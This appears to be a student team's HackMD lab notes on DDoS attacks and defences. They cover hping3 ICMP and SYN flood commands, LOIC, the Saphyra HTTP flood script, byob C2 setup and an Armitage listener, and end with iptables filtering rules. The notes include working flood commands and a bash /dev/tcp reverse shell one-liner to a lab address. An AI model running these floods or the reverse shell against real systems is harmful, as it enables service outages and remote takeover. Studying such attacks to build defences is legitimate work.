DDOS - HackMD

# DDOS [TOC] https://github.com/jgamblin/Mirai-Source-Code/blob/master/ForumPost.md ----- # 分工 ## 使用的技術攻擊者 - Attack Script - 找最新 Attack 技術防禦 - ML - 要去找防禦的技術 Env (For 實驗) - 建環境或找實體環境 ----- # 攻擊點 ## Bandwidth ![](https://i.imgur.com/BnaDI57.png) 有papaer -> 可以到 1.7TB/s 的檔案傳輸 ## Memory # Attack tools ## low orbit ion cannon https://github.com/NewEraCracker/LOIC Linux mono(require) https://www.monodevelop.com/download/#fndtn-download-lin ``` apt-get install mono-complete ``` ## hping3 ### ICMP flooding -> Attack bandwidth ``` hping3 -1 --flood <ip Address> ``` ![](https://i.imgur.com/4gi36jn.png) ![](https://i.imgur.com/5AwvpRL.png) Wire Shark ![](https://i.imgur.com/pJUqLKo.png) Defense -> ICMP disable ### SYN flooding ``` hping3 -d 200 -p 80 -S --flood <ip address> ``` 192.168.86.181 D -> 200 byte ![](https://i.imgur.com/cjhO149.png) ![](https://i.imgur.com/SFN4inm.png) ![](https://i.imgur.com/r61N8Ax.png) defend -> firewall ## Saphyra ### Http Get 繞過Firewall 使用不同 userAgent(http header) 來造成混洨 http Get -> request traget host Script https://github.com/IkzCx/ProgramsForDDos/blob/master/Saphyra.py ![](https://i.imgur.com/2HPiQk6.png) # analysis tool ## nload 使用方法 ``` nload ``` # C2 server ## byob [byob]([https://bit.ly/30tJm22](https://www.youtube.com/redirect?event=video_description&redir_token=QUFFLUhqbEg1cHE4V2VvTnY4THo0S0x0eWs4QWEyaElGUXxBQ3Jtc0trQ0xKNklDTDVVV0tPS210cThZRDlEMHk1TzY0cGR4TFEya3cyRlNjcjAzbTNhaU5aeEFnXzFKU1dndDJ1ZHE0ajJsRE15a2ZBaGQzdlRMcUZIanE0VzhNNFdxMG5MdFBRb3M5aVFvU0VNTl94NEwtSQ&q=https%3A%2F%2Fbit.ly%2F30tJm22&v=eZYtnzODpW4)) DOC https://github.com/malwaredllc/byob/wiki ## LinuxEnv setup [video1](https://www.youtube.com/watch?v=uVyniPrTzuk) [video2](https://www.youtube.com/watch?v=eYk9zWNH5ws) [video3](https://www.youtube.com/watch?v=dE-I5xKtmso) ``` git clone https://github.com/malwaredllc/byob.git ``` --- https://github.com/malwaredllc/byob/wiki/Installing-Requirements-on-Linux ``` apt insatll python2 ``` Run setup.py ## Armitage https://github.com/Intek13x/armitage ![](https://i.imgur.com/SSQyv8i.png) ## Creating a Listener in Armitage ![](https://i.imgur.com/ywgy6qM.png) ``` host:127.0.0.1 port 55555 Account : meowhecker Password: meowhecker ``` Reverse shell ``` bash -c '0<&103-;exec 103<>/dev/tcp/192.168.203.151/443;sh <&103 >&103 2>&103' ``` ![](https://i.imgur.com/i54wU6b.png) ![](https://i.imgur.com/zuXpzv2.png) ## IEEE paper ### [Intelligent Detection System for a Distributed Denial-of - Service (DDoS) Attack Based on Time Series](https://ieeexplore.ieee.org/document/10100180/) # Analysis Hping3 攻擊行為 ![](https://i.imgur.com/CyGFEyL.png) # iptables Linux Firewall ### flag - t table - A append Rule 加到最後 - I insert Rule "?" default = 1 - v verbose - I ## Filter Table ### Input chain (in bound 入站) Add New Rules ``` iptables -t filter -A INPUT -j DROP -p tcp --dport 80 ``` ![](https://i.imgur.com/wn1UQSF.png) Delete Rules ``` iptables -t filter -D INPUT 1 ``` 刪掉第一個Rules ![](https://i.imgur.com/5c4M5Bb.png) ### Output chain (out bound 出站) ping 192.168.203.151 PING 192.168.203.151 (192.168.203.151) 56(84) bytes of data. 64 bytes from 192.168.203.151: icmp_seq=1 ttl=64 time=5.23 ms 64 bytes from 192.168.203.151: icmp_seq=2 ttl=64 time=1.02 ms ``` iptables -t filter -A OUTPUT -j DROP -p icmp -d 192.168.203.151 ``` root@ubuntu:/home/user# ping 192.168.203.151PING 192.168.203.151 (192.168.203.151) 56(84) bytes of data. ping: sendmsg: Operation not permitted ping: sendmsg: Operation not permitted ping: sendmsg: Operation not permitted ping: sendmsg: Operation not permitted ### Mac filter (MAC 過濾) (有效) ``` iptables -A INPUT -m mac --mac-source 00:0c:29:45:2d:c2 -j DROP ``` ## Nat Table (NAT 設定) show ``` iptables -t nat -L ``` Nat Table 會有4個chain - PreRouting(Before Routing) 改 destination IP or Address 可以進行轉發 - INPUT - OUTPUT - PostRouting(After Routing) 改 Source IP or Address ## Prevent SYN